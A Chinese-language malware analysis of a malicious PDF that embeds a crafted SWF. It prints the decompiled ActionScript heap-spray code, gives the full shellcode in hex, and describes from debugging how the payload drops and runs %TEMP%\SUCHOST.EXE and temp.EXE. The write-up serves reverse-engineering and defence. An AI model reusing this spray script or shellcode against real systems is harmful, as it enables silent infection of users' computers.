这是一个1.7版本的PDF文档,在头部可以看到他的特征标记:
%PDF-1.7
%忏嫌
在第10个obj处是一个SWF了,可以明显看到FWS文件头,但是这个SWF是无害的,可能是创造了一个不正确的结构使得软件解析错误。(偏移十进制:4146)
紧接着,第11个OBJ处又是一个SWF,这个SWF是恶意的了(偏移十进制:4146+1315)
SWF含有两个frame,动作脚本显示加载第一个frame时会执行恶意代码:

package save_fla
{
    import flash.display.*;
    import flash.utils.*;

    dynamic public class MainTimeline extends MovieClip
    {
        public var byteArr:ByteArray;
        public var b:Object;
        public var a:Object;

        public function MainTimeline()
        {
            addFrameScript(0, frame1);
            return;
        }// end function

        function frame1()
        {
            b = "\f\f\f\f";
            a = "\x13\x13\x13\x13"; 
            while (b.length < 1048576)   //写入超长数据
            {
                // label
                b = b + a;
            }// end while
            byteArr = new ByteArray();
            byteArr.writeByte(64);
            byteArr.writeByte(64);
            byteArr.writeByte(64);
            byteArr.writeByte(64);
            while (byteArr.length < 1048576 * 64)  //当然这段数据更长
            {
                // label
                byteArr.writeMultiByte(b, "iso-8859-1");
            }// end while
            byteArr.writeByte(144);  //正统shellcode部分
            byteArr.writeByte(144);
            //…………………………………………………………省略
            byteArr.writeByte(107);
            byteArr.writeByte(97);
            byteArr.writeByte(107);
            return;
        }// end function

    }
}


ShellCode可获取如下数据(十六进制):
90909090909081EC200100008BFC83C704C7073274910CC747048E130AACC7470839E27D83C7470C8FF21861C747109332E494C74714A932E494C7471843BEACDBC7471CB2360F13C74720C48D1F74C74724512FA201C7472857660DFFC7472C9B878BE5C74730EDAFFFB4E9D802000064A1300000008B400C8B701CAD8B68088BF76A0D59E879020000E2F98BEE8B453089455081EC000400008BF483C604FF552C8BD033C042803A2275FA4083F80275F44233C040803C022275F9C60402006A0068800000006A036A006A03680000008052FF551083F8000F8E1B0200008945308BFE576800010000FF550833C040803C070075F9894560C704075C535543C7440704484F5354C74407082E455845C644070C006A006A006A026A006A00680000004057FF551083F8000F8EC9010000894534C745400000000081EE000500006A006A0068002500008B453050FF55186A008D4540506A3056FF7530FF551C89B5800000008B46288945588B462C89455405005000000500B000006A006A00508B453050FF5518C7454000000000C745440000000033DB8B5D586A008D454050680004000056FF7530FF551C33C9B90004000080740EFF97E2F98BC32D0004000083F8007F03895D406A008D454450FF754056FF7534FF552081EB0004000083FB007FB6FF7534FF55286A0057FF55248B4560C704075C74656DC744070
4702E6578C7440708650000006A006A006A026A006A00680000004057FF551083F8000F8ED30000008945346A006A0068005000008B453050FF5518C7454000000000C745440000000033DB8B5D5481C300B000006A008D454050680004000056FF7530FF551C33C9B90004000080740EFFA0E2F98BC32D0004000083F8007F03895D406A008D454450FF754056FF7534FF552081EB0004000083FB007FB66A006A0068002500008B453050FF55186A008D4540506A3056FF7530FF551C89B5800000006A006A0068009000008B453450FF55188B85800000006A008D4D4451FF754050FF7534FF5520FF7534FF55286A0057FF5524FF7530FF5528FF55046A0050FF550C51568B753C8B742E7803F5568B762003F533C94941AD03C533DB0FBE103AD67408C1CB0703DA40EBF13B1F75E75E8B5E2403DD668B0C4B8B5E1C03DD8B048B03C5AB5E59C3E823FDFFFF616B616B

生成exe之后使用OllyDebug调试:
程序段先移入一大堆函数地址,然后GetCommandLineA获取命令行,然后CreateFileA打开自己,失败则GetFileSize ,如果文件存在则TerminateProcess中止进程。成功则GetTempPathA,CreateFileA: %TEMP%\SUCHOST.EXE,写入一些无效数据并WinExec执行,然后又CreateFileA: %TEMP%\temp.EXE,同样WinExec执行,最后也是TerminateProcess中止了自己。